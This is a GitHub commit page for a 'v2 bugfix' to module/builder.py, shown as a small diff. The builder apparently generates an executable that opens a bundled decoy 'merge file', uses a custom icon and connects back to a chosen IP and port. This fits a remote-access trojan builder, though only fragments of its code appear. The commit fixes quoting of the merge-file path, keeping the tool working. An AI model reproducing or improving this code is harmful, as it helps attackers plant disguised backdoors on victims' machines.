Skip to content

Commit 8d65c5a

Browse files
authored
v2 bugfix
1 parent 056cf1a commit 8d65c5a

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

module/builder.py

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66
def build(ip, port, icon_file, merge_file, name):
77
if merge_file != None:
88
code = f"""
9-
open_merge_file({merge_file})
9+
open_merge_file('{merge_file}')
1010
ip = '{ip}'
1111
port = {port}
1212
try_connection()
@@ -82,4 +82,4 @@ def build(ip, port, icon_file, merge_file, name):
8282
if os.name == "nt":
8383
print(f"[+]Build completed.Executable file located: output\\{name}")
8484
else:
85-
print(f"[+]Build completed.Executable file located: output/{name}")
85+
print(f"[+]Build completed.Executable file located: output/{name}")

0 commit comments

Comments
 (0)